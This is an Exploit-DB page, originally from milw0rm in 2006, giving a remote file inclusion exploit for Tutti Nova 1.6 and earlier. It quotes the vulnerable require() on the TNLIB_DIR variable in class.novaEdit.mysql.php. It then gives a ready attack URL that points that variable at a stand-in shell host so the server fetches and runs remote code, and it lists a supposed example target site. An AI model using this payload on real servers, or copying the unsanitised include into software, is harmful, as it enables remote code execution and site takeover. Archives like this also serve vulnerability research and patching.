Exploits
GHDB
Papers
Shellcodes
Search EDB
SearchSploit Manual
Submissions
Online Training
Stats
About Us
Search
#============================================================================================== #Tutti Nova <= v1.6 (TNLIB_DIR) Remote File Inclusion Exploit #=============================================================================================== # #Critical Level : Dangerous # #Venedor site : http://prdownloads.sourceforge.net/tuttinova/tuttinova-1.6.zip # #Version : 3.5 # #================================================================================================ #Bug in : include/novalib/class.novaEdit.mysql.php # #Vlu Code : #-------------------------------- # <?php # # // FILE: class.novaEdit.mysql.php # # # require("{$TNLIB_DIR}class.novaRead.mysql.php"); # # class novaEdit extends novaRead # #================================================================================================ # #Exploit : #-------------------------------- # #http://sitename.com/[Script Path]/include/novalib/class.novaEdit.mysql.php?TNLIB_DIR=http://SHELLURL.COM? # #Example : http://uryuu.com/php/tuttinova-1.6/ # # #================================================================================================ #Discoverd By : SHiKaA # #Conatact : SHiKaA-[at]hotmail.com # #GreetZ : Str0ke XoRon Bl@Ck^B1rd AND ALL ccteam (coder-cruze-wolf) ================================================================================================== # milw0rm.com [2006-08-19]